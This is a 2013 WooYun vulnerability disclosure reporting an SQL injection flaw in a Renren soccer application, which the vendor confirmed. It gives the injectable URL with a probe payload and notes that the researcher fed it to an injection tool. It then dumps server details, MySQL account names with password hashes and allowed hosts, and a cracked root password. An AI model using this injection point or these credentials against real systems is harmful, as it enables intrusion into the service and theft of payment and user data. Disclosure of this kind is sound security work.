当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035023

漏洞标题:人人网某重要应用SQL注入漏洞

相关厂商:人人网

漏洞作者: 雨夜

提交时间:2013-08-22 20:59

修复时间:2013-10-06 21:00

公开时间:2013-10-06 21:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-22: 细节已通知厂商并且等待厂商处理中
2013-08-22: 厂商已经确认,细节仅向厂商公开
2013-09-01: 细节向核心白帽子及相关领域专家公开
2013-09-11: 细节向普通白帽子公开
2013-09-21: 细节向实习白帽子公开
2013-10-06: 细节向公众公开

简要描述:

人人网某重要应用SQL注入漏洞,可以列数据,破密码,读文件,权限root,数据还满敏感的。

详细说明:

Target: 		http://app.soccer.renren.com/go_rr.php?sid=16
Host IP: 211.151.101.141
Web Server: nginx/0.8.54
Powered-by: PHP/5.3.8
DB Server: MySQL
Resp. Time(avg): 9 ms
Current User: [email protected]
Sql Version: 5.0.86-log
Current DB: pay_renren
System User: [email protected]
Host Name: NYSJHL100-128.OPI.COM
Installation dir: /usr/local/
Compile OS: portbld-freebsd8.0
DB User & Pass: root:*BE817F5191DB8CB69C12DDD8846F07277C877B61:localhost
dbustop:*B23BCE5913B4C8EE3DB9CB1F8A62BCAE6A89C0F4:localhost
root:*BE817F5191DB8CB69C12DDD8846F07277C877B61:127.0.0.1
dburryw:*2E015CD369B2CC4E26AC5872C572342F5B6D5147:127.0.0.1
dburrzq1:*73C32BC9D9C7FF7CE0E0B7F77A0C48136C197ED7:127.0.0.1
repp:*DC6929A164E45EFF0148D5A231AD7C82129EBE8F:%
cactiuser:*1CFFD97DE9866A8C2E4F49D06451ADE310A1CD57:%
admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:localhost
cacti:*1CFFD97DE9866A8C2E4F49D06451ADE310A1CD57:59.151.30.229
multi_admin:*4FD92416C02EC3BD04A97613DB2CB33717E99D0F:218.240.151.40
multi_admin:*4FD92416C02EC3BD04A97613DB2CB33717E99D0F:localhost
root:*BE817F5191DB8CB69C12DDD8846F07277C877B61:202.85.216.176
cactiuser:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19:59.151.39.124
rep:*DC6929A164E45EFF0148D5A231AD7C82129EBE8F:%
Data Bases: information_schema
gamecenter
mysql
pay_renren
soccer
test


root密码是1qaz2wsx= 有点小弱口令噢
注入地址
http://app.soccer.renren.com/go_rr.php?sid=16%20and%201=2
直接挂上cookie丢到萝卜里

biao.jpg


可以操作mysql表喔

mysql.jpg


这个pay_renren好像就是人人网充值的账户

pay.jpg


看下数据量有点吓人,订单数20万条

orders.jpg


足球游戏的数据库,非常整齐的游戏库

soccor.jpg


漏洞证明:

如上,完全不需要进后台,你们懂的

修复方案:

需要打码请at疯狗,需要修复请自己来,要送礼物请速度!

版权声明:转载请注明来源 雨夜@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-22 21:47

厂商回复:

感谢,已经通知第三方处理

最新状态:

暂无